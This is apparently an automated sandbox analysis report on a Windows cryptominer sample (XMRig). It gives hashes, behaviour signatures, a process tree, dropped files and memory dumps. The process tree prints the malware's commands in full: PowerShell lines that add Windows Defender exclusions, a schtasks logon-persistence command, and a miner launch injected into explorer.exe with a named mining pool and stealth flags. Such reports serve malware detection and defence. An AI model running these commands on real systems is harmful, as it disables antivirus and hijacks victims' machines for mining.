Analysis

  • max time kernel
    1s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-04-2024 16:36

General

  • Target

    e7ea8b9f6aa07116680d92e67d8f2e20_JaffaCakes118.exe

  • Size

    98KB

  • MD5

    e7ea8b9f6aa07116680d92e67d8f2e20

  • SHA1

    692784a3f2a886baaf46088e211f92bf29639222

  • SHA256

    9c0ae144e0f2efbc62a9e0abb51c028bcb594ac64bffde2a582a7eba6635a9af

  • SHA512

    3788da821eecc0acd132baf36ec7e86ac987208ff1e7c4fa30c76c3f517c6c10e77e628376b4ab9d30c645e7b5bfe75f2c235ca07421a69a27bdc3dd209abfca

  • SSDEEP

    1536:+gyHGXnfvNTtanlCboCfajCrNrvSla5w9AsuPVIjOzJN0dtvzJFRe5EKlLcS:+gzdclCbYCrtsxpufFCRzJFRe5EELc

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e7ea8b9f6aa07116680d92e67d8f2e20_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e7ea8b9f6aa07116680d92e67d8f2e20_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4480
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
          PID:3560
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\e7ea8b9f6aa07116680d92e67d8f2e20_JaffaCakes118.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:624
        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\e7ea8b9f6aa07116680d92e67d8f2e20_JaffaCakes118.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3956
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3788
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
              5⤵
              • Creates scheduled task(s)
              PID:2560
          • C:\Windows\system32\services64.exe
            "C:\Windows\system32\services64.exe"
            4⤵
              PID:1256
              • C:\Windows\system32\cmd.exe
                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                5⤵
                  PID:4136
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                    6⤵
                      PID:4568
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                      6⤵
                        PID:4104
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                        6⤵
                          PID:4976
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                          6⤵
                            PID:1588
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                          5⤵
                            PID:4340
                            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                              6⤵
                                PID:3200
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                  7⤵
                                    PID:1248
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                                      8⤵
                                      • Creates scheduled task(s)
                                      PID:968
                                  • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                                    "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                                    7⤵
                                      PID:3668
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6046882 --pass=NLLOX --cpu-max-threads-hint=30 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                      7⤵
                                        PID:4768
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                        7⤵
                                          PID:3004
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 3
                                            8⤵
                                              PID:1080
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                      4⤵
                                        PID:2412
                                        • C:\Windows\system32\choice.exe
                                          choice /C Y /N /D Y /T 3
                                          5⤵
                                            PID:2276
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    1⤵
                                      PID:4640
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                      1⤵
                                        PID:624

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        d85ba6ff808d9e5444a4b369f5bc2730

                                        SHA1

                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                        SHA256

                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                        SHA512

                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

                                        Filesize

                                        539B

                                        MD5

                                        b245679121623b152bea5562c173ba11

                                        SHA1

                                        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                                        SHA256

                                        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                                        SHA512

                                        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        15dde0683cd1ca19785d7262f554ba93

                                        SHA1

                                        d039c577e438546d10ac64837b05da480d06bf69

                                        SHA256

                                        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                        SHA512

                                        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        07a771c4f31f62b2d04e2befaa36dce7

                                        SHA1

                                        662952ede6c1acbb575e8149a5ac2f08edade811

                                        SHA256

                                        a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3

                                        SHA512

                                        9e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        e60eb305a7b2d9907488068b7065abd3

                                        SHA1

                                        1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

                                        SHA256

                                        ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

                                        SHA512

                                        95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        da5c82b0e070047f7377042d08093ff4

                                        SHA1

                                        89d05987cd60828cca516c5c40c18935c35e8bd3

                                        SHA256

                                        77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                                        SHA512

                                        7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        d28a889fd956d5cb3accfbaf1143eb6f

                                        SHA1

                                        157ba54b365341f8ff06707d996b3635da8446f7

                                        SHA256

                                        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                        SHA512

                                        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        98baf5117c4fcec1692067d200c58ab3

                                        SHA1

                                        5b33a57b72141e7508b615e17fb621612cb8e390

                                        SHA256

                                        30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                                        SHA512

                                        344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        22310ad6749d8cc38284aa616efcd100

                                        SHA1

                                        440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                        SHA256

                                        55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                        SHA512

                                        2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2mqaan2y.c00.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe

                                        Filesize

                                        35KB

                                        MD5

                                        02ee856c21cb734b2a856064d97d8a0b

                                        SHA1

                                        5d2c7a8fb96a45cb288854f5f8e22ed63a3fd238

                                        SHA256

                                        a5949f1c4d42cdd20c982aabfef5e0d56df3207f69608881bfcc9b21fdeb3a92

                                        SHA512

                                        6e2ff4b9e5114b5a100acbe82b262ed0c07146adabb7a065123b5b7cc793c3958243d312f206bc14fa85a586992e65eaf3cf0eccb5a2f81281558b3b2b393efb

                                      • C:\Windows\System32\Microsoft\Libs\sihost64.exe

                                        Filesize

                                        7KB

                                        MD5

                                        a9c2eae7bcf7bf2ca5eacef2b6cdf682

                                        SHA1

                                        d231a417bc91ea112c8a847f0cf7a26f6d94aa58

                                        SHA256

                                        cb28d92239199b286d46bf7b0f7b71c57d473d50300678dab2316bf06a4319d0

                                        SHA512

                                        39ac2a3cc496e2099dd9bc38b55d4675e84c2fbbae820f770fa882e5dc696518eb4a8531a9e8b3e77cbd76644a32c6d644bc6ecf27c531c59ef19c1c415280e1

                                      • C:\Windows\system32\services64.exe

                                        Filesize

                                        98KB

                                        MD5

                                        e7ea8b9f6aa07116680d92e67d8f2e20

                                        SHA1

                                        692784a3f2a886baaf46088e211f92bf29639222

                                        SHA256

                                        9c0ae144e0f2efbc62a9e0abb51c028bcb594ac64bffde2a582a7eba6635a9af

                                        SHA512

                                        3788da821eecc0acd132baf36ec7e86ac987208ff1e7c4fa30c76c3f517c6c10e77e628376b4ab9d30c645e7b5bfe75f2c235ca07421a69a27bdc3dd209abfca

                                      • memory/968-7-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/968-9-0x00000167B8460000-0x00000167B8470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/968-20-0x00000167D4470000-0x00000167D4492000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/968-30-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/968-8-0x00000167B8460000-0x00000167B8470000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1256-91-0x00000000012C0000-0x00000000012D0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1256-89-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1256-102-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1588-172-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1588-176-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1588-174-0x000001A94AE20000-0x000001A94AE30000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1588-173-0x000001A94AE20000-0x000001A94AE30000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3200-112-0x000000001C890000-0x000000001C8A0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3200-183-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3200-111-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3560-62-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3560-63-0x0000018AC8F50000-0x0000018AC8F60000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3560-64-0x0000018AC8F50000-0x0000018AC8F60000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3560-76-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3668-195-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3668-128-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3668-129-0x000000001BD60000-0x000000001BD70000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3668-126-0x0000000000230000-0x0000000000236000-memory.dmp

                                        Filesize

                                        24KB

                                      • memory/3956-88-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3956-23-0x00000000003B0000-0x00000000003BE000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/3956-24-0x0000000000D70000-0x0000000000D82000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/3956-25-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3956-26-0x0000000002B50000-0x0000000002B60000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4104-146-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4104-142-0x0000022966910000-0x0000022966920000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4104-143-0x0000022966910000-0x0000022966920000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4104-137-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4216-37-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4216-45-0x000001FED62D0000-0x000001FED62E0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4216-38-0x000001FED62D0000-0x000001FED62E0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4216-43-0x000001FED62D0000-0x000001FED62E0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4216-47-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4464-6-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4464-2-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4464-3-0x000000001CAC0000-0x000000001CAD0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4464-1-0x0000000003880000-0x000000000388E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/4464-0-0x0000000000F10000-0x0000000000F2C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/4568-94-0x000001F2C6200000-0x000001F2C6210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4568-92-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4568-131-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4568-95-0x000001F2C6200000-0x000001F2C6210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4640-61-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4640-48-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4640-59-0x00000248F8D00000-0x00000248F8D10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4768-184-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-189-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-178-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-179-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-182-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-194-0x00000000038C0000-0x00000000038C4000-memory.dmp

                                        Filesize

                                        16KB

                                      • memory/4768-191-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-181-0x0000000001FC0000-0x0000000001FE0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4768-185-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-180-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-186-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-187-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-188-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-193-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4768-190-0x0000000002170000-0x0000000002174000-memory.dmp

                                        Filesize

                                        16KB

                                      • memory/4768-192-0x0000000140000000-0x0000000140786000-memory.dmp

                                        Filesize

                                        7.5MB

                                      • memory/4976-161-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4976-159-0x00000239D6700000-0x00000239D6710000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/4976-153-0x00007FF9F7000000-0x00007FF9F7AC1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4976-154-0x00000239D6700000-0x00000239D6710000-memory.dmp

                                        Filesize

                                        64KB